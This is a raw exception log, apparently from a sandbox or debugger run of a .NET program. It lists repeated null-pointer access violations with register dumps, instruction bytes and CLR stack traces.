exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4d81b62
registers.esp: 3007728
registers.edi: 3008028
registers.eax: 0
registers.ebp: 3008040
registers.edx: 14846584
registers.ebx: 3010924
registers.esi: 45573776
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x4d85490
0x4d86fdc
0x4d86a39
0x4d80c55
0x65f7da
0x65e469
0x65d9ff
0x657855
0x656f0b
0x653c6b
0x6535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4d854d3
registers.esp: 3008016
registers.edi: 3008324
registers.eax: 0
registers.ebp: 3008024
registers.edx: 0
registers.ebx: 3010924
registers.esi: 45573776
registers.ecx: 45793212
1 0 0

__exception__

stacktrace:
0x4d86c1c
0x4d86a39
0x4d80c6d
0x65f7da
0x65e469
0x65d9ff
0x657855
0x656f0b
0x653c6b
0x6535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 94 8c e2 00 89 85 04 ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4d81b62
registers.esp: 3007728
registers.edi: 3008028
registers.eax: 0
registers.ebp: 3008040
registers.edx: 14846584
registers.ebx: 3010924
registers.esi: 45573776
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x4d85490
0x4d86fdc
0x4d86a39
0x4d80c6d
0x65f7da
0x65e469
0x65d9ff
0x657855
0x656f0b
0x653c6b
0x6535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4d854d3
registers.esp: 3008016
registers.edi: 3008324
registers.eax: 0
registers.ebp: 3008024
registers.edx: 0
registers.ebx: 3010924
registers.esi: 45573776
registers.ecx: 47240640
1 0 0

__exception__

stacktrace:
0x4d86c1c
0x4d86a39
0x4d80c6d
0x65f7da
0x65e469
0x65d9ff
0x657855
0x656f0b
0x653c6b
0x6535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 94 8c e2 00 89 85 04 ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4d81b62
registers.esp: 3007728
registers.edi: 3008028
registers.eax: 0
registers.ebp: 3008040
registers.edx: 14846584
registers.ebx: 3010924
registers.esi: 45573776
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x4d85490
0x4d86fdc
0x4d86a39
0x4d80c6d
0x65f7da
0x65e469
0x65d9ff
0x657855
0x656f0b
0x653c6b
0x6535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4d854d3
registers.esp: 3008016
registers.edi: 3008324
registers.eax: 0
registers.ebp: 3008024
registers.edx: 0
registers.ebx: 3010924
registers.esi: 45573776
registers.ecx: 48733444
1 0 0

__exception__

stacktrace:
0x4d85490
0x4d88363
0x4d8790e
0x65e4c1
0x65d9ff
0x657855
0x656f0b
0x653c6b
0x6535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4d854d3
registers.esp: 3008836
registers.edi: 3009100
registers.eax: 0
registers.ebp: 3008844
registers.edx: 0
registers.ebx: 3010924
registers.esi: 49275128
registers.ecx: 49282104
1 0 0

__exception__

stacktrace:
0x809901
0x809703
0x807710
0x806f0b
0x803c6b
0x8035d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x809a38
registers.esp: 3927076
registers.edi: 3927128
registers.eax: 0
registers.ebp: 3927140
registers.edx: 4428312
registers.ebx: 3928580
registers.esi: 45850280
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x28a73f9
0x28a725a
0x28a712d
0x28a59e3
0x28a4b79
0x80d9ff
0x807855
0x806f0b
0x803c6b
0x8035d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 18 bb 00 01 89 85 04 ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x28a803a
registers.esp: 3925316
registers.edi: 3925616
registers.eax: 0
registers.ebp: 3925628
registers.edx: 16824572
registers.ebx: 3928580
registers.esi: 46557040
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x28ab970
0x28a79c4
0x28a725a
0x28a712d
0x28a59e3
0x28a4b79
0x80d9ff
0x807855
0x806f0b
0x803c6b
0x8035d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x28ab9b3
registers.esp: 3925604
registers.edi: 3925948
registers.eax: 0
registers.ebp: 3925612
registers.edx: 0
registers.ebx: 3928580
registers.esi: 46557040
registers.ecx: 47806624
1 0 0

__exception__

stacktrace:
0x28a73f9
0x28a725a
0x28a7145
0x28a59e3
0x28a4b79
0x80d9ff
0x807855
0x806f0b
0x803c6b
0x8035d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 18 bb 00 01 89 85 04 ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x28a803a
registers.esp: 3925316
registers.edi: 3925616
registers.eax: 0
registers.ebp: 3925628
registers.edx: 16824572
registers.ebx: 3928580
registers.esi: 46557040
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x28ab970
0x28a79c4
0x28a725a
0x28a7145
0x28a59e3
0x28a4b79
0x80d9ff
0x807855
0x806f0b
0x803c6b
0x8035d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x28ab9b3
registers.esp: 3925604
registers.edi: 3925948
registers.eax: 0
registers.ebp: 3925612
registers.edx: 0
registers.ebx: 3928580
registers.esi: 46557040
registers.ecx: 45520948
1 0 0

__exception__

stacktrace:
0x28a73f9
0x28a725a
0x28a7145
0x28a59e3
0x28a4b79
0x80d9ff
0x807855
0x806f0b
0x803c6b
0x8035d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 18 bb 00 01 89 85 04 ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x28a803a
registers.esp: 3925316
registers.edi: 3925616
registers.eax: 0
registers.ebp: 3925628
registers.edx: 16824572
registers.ebx: 3928580
registers.esi: 45507072
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x28ab970
0x28a79c4
0x28a725a
0x28a7145
0x28a59e3
0x28a4b79
0x80d9ff
0x807855
0x806f0b
0x803c6b
0x8035d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x28ab9b3
registers.esp: 3925604
registers.edi: 3925948
registers.eax: 0
registers.ebp: 3925612
registers.edx: 0
registers.ebx: 3928580
registers.esi: 45507072
registers.ecx: 46880332
1 0 0

__exception__

stacktrace:
0x28abee8
0x28abd39
0x28a712d
0x28a5ccc
0x28a4b79
0x80d9ff
0x807855
0x806f0b
0x803c6b
0x8035d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 18 bb 00 01 89 85 04 ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x28a803a
registers.esp: 3925292
registers.edi: 3925592
registers.eax: 0
registers.ebp: 3925604
registers.edx: 16824572
registers.ebx: 3928580
registers.esi: 45507072
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x28ab970
0x28ac47e
0x28abd39
0x28a712d
0x28a5ccc
0x28a4b79
0x80d9ff
0x807855
0x806f0b
0x803c6b
0x8035d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
